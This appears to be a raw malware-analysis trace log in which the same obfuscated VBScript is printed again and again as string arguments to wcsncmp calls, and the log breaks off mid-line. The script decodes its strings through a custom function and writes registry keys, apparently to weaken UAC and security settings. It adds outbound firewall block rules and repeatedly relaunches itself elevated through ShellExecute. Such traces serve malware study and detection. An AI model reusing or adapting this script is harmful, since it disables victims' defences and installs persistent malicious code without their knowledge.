bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 57 [0222.991] wcsncmp (_String1="MDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 64 [0222.992] wcsncmp (_String1="DNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0222.992] wcsncmp (_String1="NEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 65 [0222.992] wcsncmp (_String1="EXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0222.992] wcsncmp (_String1="XEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim 